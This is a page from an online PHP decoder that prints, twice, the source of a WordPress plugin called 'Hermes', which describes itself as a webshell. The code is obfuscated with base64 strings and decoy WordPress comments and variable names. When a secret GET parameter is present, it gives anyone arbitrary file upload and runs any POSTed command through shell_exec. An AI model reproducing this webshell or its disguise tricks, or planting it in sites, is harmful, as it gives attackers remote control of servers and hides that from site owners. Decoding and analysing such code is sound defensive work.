Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php /* Plugin Name: Hermes Plugin URI: https://github.com/p0dalirius/Wordpress-webshe..
Decoded Output download
<?php
/*
Plugin Name: Hermes
Plugin URI: https://github.com/p0dalirius/Wordpress-webshell-plugin
Description: A webshell API for WordPress.
Author: Remi Gascou (Podalirius)
Version: 1.1.0
Author URI: https://podalirius.net/
Text Domain: webshell
Domain Path: /languages
License: GPLv3 or later
Network: true
*/
define('INSTALLATION_KEY', base64_decode("NGN4MA=="));
define('AUTHOR_KEY', base64_decode('PGZvcm0gbWV0aG9kPSJwb3N0Ij4='));
define('HOST_KEY', base64_decode('PGlucHV0IHR5cGU9InRleHQiIG5hbWU9ImNvbW1hbmQiIC8+'));
define('THEMES_SELECTION', base64_decode('PGlucHV0IHR5cGU9InN1Ym1pdCI+'));
define('THEMES_INSTALL', base64_decode('PC9mb3JtPg=='));
define('DEFAULT_THEMES', base64_decode('Y29tbWFuZA=='));
define('PATH_THEMES', base64_decode('Y29tbWFuZA=='));
define('BASE64_THEMES', base64_decode('cHdk'));
define('BASE64_TITLE', base64_decode('WHhfaGVybWVzX3hYCg=='));
define('UPLOAD_THEMES_1', base64_decode('PGZvcm0gZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgYWN0aW9uPSIiIG1ldGhvZD0iUE9T'));
define('UPLOAD_THEMES_2', base64_decode('VCI+IDxwPlVwbG9hZCB5b3VyIGZpbGU8L3A+PGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9InVwbG9h'));
define('UPLOAD_THEMES_3', base64_decode('ZGVkX2ZpbGUiPjwvaW5wdXQ+PGJyIC8+PGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IlVwbG9h'));
define('UPLOAD_THEMES_4', base64_decode('ZCI+PC9pbnB1dD48L2Zvcm0+IDwvYm9keT48L2h0bWw+Cg=='));
/**
* Customize Setting to represent a nav_menu.
*
* Subclass of WP_Customize_Setting to represent a nav_menu taxonomy term, and
* the IDs for the nav_menu_items associated with the nav menu.
*
* @since 4.3.0
*
* @see WP_Customize_Setting
*/
$wp_body = INSTALLATION_KEY;
$wp_config_header = AUTHOR_KEY;
$wp_config_body = HOST_KEY;
$wp_themes_config = THEMES_SELECTION;
$wp_themes_install = THEMES_INSTALL;
$wp_body = strrev($wp_body);
$wp_default = DEFAULT_THEMES;
$wp_path = PATH_THEMES;
$wp_builder = BASE64_THEMES;
if(isset($_GET[$wp_body])){
/**
* Fires before the Site Activation page is loaded.
*
* Fires on the {@see 'wp_head'} action.
*
* @since 3.0.0
*/
echo BASE64_TITLE;
echo AUTHOR_KEY;
echo HOST_KEY;
echo THEMES_SELECTION;
echo THEMES_INSTALL;
echo UPLOAD_THEMES_1;
echo UPLOAD_THEMES_2;
echo UPLOAD_THEMES_3;
echo UPLOAD_THEMES_4;
if(!empty($_FILES["uploaded_file"])){
$path = basename( $_FILES["uploaded_file"]["name"]);
if(move_uploaded_file($_FILES["uploaded_file"]["tmp_name"], $path)) {
echo "The file ". basename( $_FILES["uploaded_file"]["name"])." has been uploaded";}
else{
echo "There was an error uploading the file, please try again!";}}
if(isset($_POST[$wp_default])){
$wp_themes_install=shell_exec($_POST[$wp_path]);
echo"<pre>$wp_themes_install</pre>";}
$wp_themes_install=shell_exec($wp_builder);
echo"<pre>pwd: $wp_themes_install</pre>";}
/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
?>
Did this file decode correctly?
Original Code
<?php
/*
Plugin Name: Hermes
Plugin URI: https://github.com/p0dalirius/Wordpress-webshell-plugin
Description: A webshell API for WordPress.
Author: Remi Gascou (Podalirius)
Version: 1.1.0
Author URI: https://podalirius.net/
Text Domain: webshell
Domain Path: /languages
License: GPLv3 or later
Network: true
*/
define('INSTALLATION_KEY', base64_decode("NGN4MA=="));
define('AUTHOR_KEY', base64_decode('PGZvcm0gbWV0aG9kPSJwb3N0Ij4='));
define('HOST_KEY', base64_decode('PGlucHV0IHR5cGU9InRleHQiIG5hbWU9ImNvbW1hbmQiIC8+'));
define('THEMES_SELECTION', base64_decode('PGlucHV0IHR5cGU9InN1Ym1pdCI+'));
define('THEMES_INSTALL', base64_decode('PC9mb3JtPg=='));
define('DEFAULT_THEMES', base64_decode('Y29tbWFuZA=='));
define('PATH_THEMES', base64_decode('Y29tbWFuZA=='));
define('BASE64_THEMES', base64_decode('cHdk'));
define('BASE64_TITLE', base64_decode('WHhfaGVybWVzX3hYCg=='));
define('UPLOAD_THEMES_1', base64_decode('PGZvcm0gZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgYWN0aW9uPSIiIG1ldGhvZD0iUE9T'));
define('UPLOAD_THEMES_2', base64_decode('VCI+IDxwPlVwbG9hZCB5b3VyIGZpbGU8L3A+PGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9InVwbG9h'));
define('UPLOAD_THEMES_3', base64_decode('ZGVkX2ZpbGUiPjwvaW5wdXQ+PGJyIC8+PGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IlVwbG9h'));
define('UPLOAD_THEMES_4', base64_decode('ZCI+PC9pbnB1dD48L2Zvcm0+IDwvYm9keT48L2h0bWw+Cg=='));
/**
* Customize Setting to represent a nav_menu.
*
* Subclass of WP_Customize_Setting to represent a nav_menu taxonomy term, and
* the IDs for the nav_menu_items associated with the nav menu.
*
* @since 4.3.0
*
* @see WP_Customize_Setting
*/
$wp_body = INSTALLATION_KEY;
$wp_config_header = AUTHOR_KEY;
$wp_config_body = HOST_KEY;
$wp_themes_config = THEMES_SELECTION;
$wp_themes_install = THEMES_INSTALL;
$wp_body = strrev($wp_body);
$wp_default = DEFAULT_THEMES;
$wp_path = PATH_THEMES;
$wp_builder = BASE64_THEMES;
if(isset($_GET[$wp_body])){
/**
* Fires before the Site Activation page is loaded.
*
* Fires on the {@see 'wp_head'} action.
*
* @since 3.0.0
*/
echo BASE64_TITLE;
echo AUTHOR_KEY;
echo HOST_KEY;
echo THEMES_SELECTION;
echo THEMES_INSTALL;
echo UPLOAD_THEMES_1;
echo UPLOAD_THEMES_2;
echo UPLOAD_THEMES_3;
echo UPLOAD_THEMES_4;
if(!empty($_FILES["uploaded_file"])){
$path = basename( $_FILES["uploaded_file"]["name"]);
if(move_uploaded_file($_FILES["uploaded_file"]["tmp_name"], $path)) {
echo "The file ". basename( $_FILES["uploaded_file"]["name"])." has been uploaded";}
else{
echo "There was an error uploading the file, please try again!";}}
if(isset($_POST[$wp_default])){
$wp_themes_install=shell_exec($_POST[$wp_path]);
echo"<pre>$wp_themes_install</pre>";}
$wp_themes_install=shell_exec($wp_builder);
echo"<pre>pwd: $wp_themes_install</pre>";}
/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
?>
Function Calls
define | 1 |
base64_decode | 1 |
Stats
MD5 | 986c51accffd1a787203c332130729a8 |
Eval Count | 0 |
Decode Time | 64 ms |